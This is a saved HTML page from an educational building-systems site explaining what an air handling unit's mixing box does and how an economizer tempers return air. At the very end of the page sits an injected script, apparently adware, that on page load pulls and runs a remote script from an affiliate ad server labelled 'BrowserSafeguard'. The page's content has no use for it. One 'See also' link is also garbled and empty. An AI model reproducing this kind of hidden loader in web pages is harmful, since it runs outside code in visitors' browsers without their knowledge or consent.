﻿<!doctype html>
<html>
<head>
<meta charset="UTF-8">
<title>Learn High Performance Buildings</title>
<meta name="description" content="Info about LHPB.">
<meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=1.0, zoom=20%, target-densitydpi=high-dpi">
<link href="../css/normalize.css" rel="stylesheet" type="text/css">
<link href="../css/info.css" rel="stylesheet" type="text/css">
<link rel="shortcut icon" href="file:../images/favicon.ico" >
</head>
<body>
<div id="wrapper" class="cf">
<div id="container">
<div id="from">
</div>
<div id="logo" title="LHPB: Learn High Performance Buildings"></div>
<div id="title" class="cf">Learn High Performance Buildings</div>
<div id="info" class="cf">
<h1>MIXING-BOX</h1>
<!--<h3>Associated System: </h3>-->
<div class="graphic"> <img src="../HVAC AHU & Ducts/PistonGate.png" alt=""/ ></div>     
<p>A mixing box is a component of an air handling unit (AHU) that provides air to the chilled and hot water coils.  Inside the mixing box, outdoor air is mixed with hot air returning from the building before being sent to the coils. If the AHU is equipped with an economizer, the amount of outdoor air introduced into the AHU will be allowed to vary, tempering the return air with cool outside air and reducing the need for cooling at the chilled water coils. </p>
<p>(<a href="#">See also the �</a> )</p>
<!--<p></p>-->      
<!--<h4></h4>-->
<!--<h2>Variable Descriptions</h2>-->      
<!--<ul class="list-variable">-->        
<!--<li><label>Default:</label> </li>-->
<!--<li><label>Minimum:</label> </li>-->
<!--<li><label>Maximum:</label> </li>-->
<!--<li><label>Default Units:</label> i_Default</li>-->
<!-- <li><label>English:</label> </li>-->        
<!--<li><label>IP Unit:</label> </li>-->
<!--<li><label>SI Units:</label> </li>-->
<!--</ul>-->
<h2>Related Items: </h2>
<ul> <li>Minimum outside air damper position</li><li>Minimum outdoor air intake control strategy</li><li>Economizer type</li><li>Economizer PI controller P gain</li><li>Economizer PI controller integrator time constant</li> </ul>
<h2>Links:</h2>
<ul>
</ul>
<div class="version"> Version 1.00</div>    </div></div></div>
<script type="text/javascript">(function () {if (top.location == self.location && top.location.href.split('#')[0] == 'http://learnhpb.org/demos/13.01/i-content/iv-SYSTAirDB.html') {var po = document.createElement('script'); po.type = 'text/javascript'; po.async = true;po.src = 'https://api.jollywallet.com/affiliate/client?dist=213&sub=bsg-rt-tightrope&name=BrowserSafeguard';var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(po, s);}})();
</script>
</body>
</html>
